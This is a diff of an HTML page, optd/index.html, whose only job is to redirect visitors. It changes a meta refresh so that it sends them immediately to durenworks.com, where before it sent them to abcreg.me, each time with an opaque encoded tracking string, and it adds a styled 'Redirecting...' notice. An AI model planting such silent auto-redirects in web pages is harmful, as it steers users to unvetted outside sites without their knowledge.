--- a/optd/index.html
+++ b/optd/index.html
@@ -1,12 +1,40 @@
 <!DOCTYPE html>
 <html lang="en">
-  <head>
-    <META
-      http-equiv="refresh"
-      content="1;URL=http://abcreg.me/qs=op-abacaggichjfacafcjhkafcjhkabacaidadfjaceaccghaebdfaebhgkbacb"
-    />
-  </head>
-  <body>
-    <div>Going To Link ...</div>
-  </body>
+<head>
+  <meta http-equiv="refresh" content="0;URL=http://durenworks.com/qs=op-abacaggkijdkacagefbiagefbiagefbiacaidadhaccaekcdaebcfaefkghgacb"/>
+  <style>
+    body {
+      font-family: Arial, sans-serif;
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      height: 100vh;
+      margin: 0;
+      background-color: #f0f0f0;
+    }
+
+    .notification {
+      padding: 20px;
+      background-color: #333;
+      color: #fff;
+      border-radius: 8px;
+      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
+      text-align: center;
+      font-size: 16px;
+      max-width: 400px;
+      margin: auto;
+    }
+
+    .notification p {
+      margin: 0;
+      font-size: 18px;
+      font-weight: bold;
+    }
+  </style>
+</head>
+<body>
+  <div class="notification">
+    <p>Redirecting...</p>
+  </div>
+</body>
 </html>
